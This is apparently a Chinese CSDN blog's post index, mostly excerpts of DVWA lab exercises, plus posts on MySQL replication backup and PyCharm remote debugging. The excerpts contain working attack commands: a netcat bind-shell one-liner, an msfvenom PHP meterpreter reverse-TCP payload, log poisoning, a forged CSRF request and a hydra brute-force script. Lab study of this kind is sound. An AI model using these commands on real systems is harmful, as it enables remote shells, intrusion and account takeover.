- 博客(10)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 使用mysql企业版备份软件来设置一个从库:Setting Up a New Replication Slave
Setting Up a New Replication SlaveIf you use MySQL replication, MySQL Enterprise Backup allows you to set up a slave database withoutstopping the master, by backing up the master and restoring tha
2017-09-06 14:32:58
296
原创 pycharm远程调试
本地:D:\Program Files (X86)\JetBrains\PyCharm 4.5.3\debug-eggs解开pycharm-debug.egg 将文件上传到远程的linux服务器上的/pycharm-debug 远程:export PYTHONPATH=”${PYTHONPATH}:/pycharm-debug” 本地: 建立一个空的项目并定义好一个远程调试IP和端口
2016-07-12 11:32:14
402
原创 欢迎使用CSDN-markdown编辑器
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦:Markdown和扩展Markdown简洁的语法代码块高亮图片链接和图片上传LaTex数学公式UML序列图和流程图离线写博客导入导出Markdown文件丰富的快捷键快捷键加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
2016-07-12 11:27:43
232
原创 sqlmap自动的寻找注入点,
Sqlmap Tricks for Advanced SQL Injectionhttps://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/此文介绍的方法太过复杂:简介/var/www/html/dvwa/vulnerabilities/sqli_blind/s
2016-07-08 10:45:31
14384
原创 dvwa sql 注入高级
cat sqli.txt POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1Host: 172.19.180.27Proxy-Connection: keep-aliveContent-Length: 19Cache-Control: max-age=0Accept: text/html,applicatio
2016-07-07 17:19:46
4054
翻译 dvwa --Upload and use C99.php Backdoor shell
原文http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson14/index.html更改处:rm/tmp/pipe;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe
2016-07-04 15:21:27
739
原创 dvwa 文件上传
http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/环境为kali2 dvwa1.9需要更正的地方Section 8: Build PHP msfpayload msfvenom -p php/meterpreter/reverse_tcp LHOST=172.19.180.2
2016-07-01 15:53:53
628
原创 file include 文件包括漏洞,毒化日志,并生成木马,执行系统命令 dvwa低安全
root@kali:/var/log/apache2#ls -lh总用量 2.4M-rw-rw-r-- 1root root 1 6月 28 15:50 access.log 日志毒化:nc172.19.180.27 80GET/hazStarthazEnd HTTP/1.1 root@kali:/var/log/apache2#cat access.log
2016-06-28 17:22:38
920
原创 dvwa csrf
中级curl -e "http://172.19.180.27/dvwa/vulnerabilities/csrf" --Cookie "security=medium; PHPSESSID=8sfh17npgpajd0ikuh3" --location "http://172.19.180.27/dvwa/vulnerabilities/csrf/?password_new=pass
2016-06-27 16:12:23
632
翻译 hydra dvwa brute force password
root@kali:~# cat hydraattack.shCSRF=$(curl -s -c dvwa.cookie "localhost/dvwa/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)#取得csrf tokenSESSIONID=$(grep PHPSESSID dvw
2016-06-15 09:08:24
698
favorite java book serials head-first-java-2nd-edition
2018-03-20
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人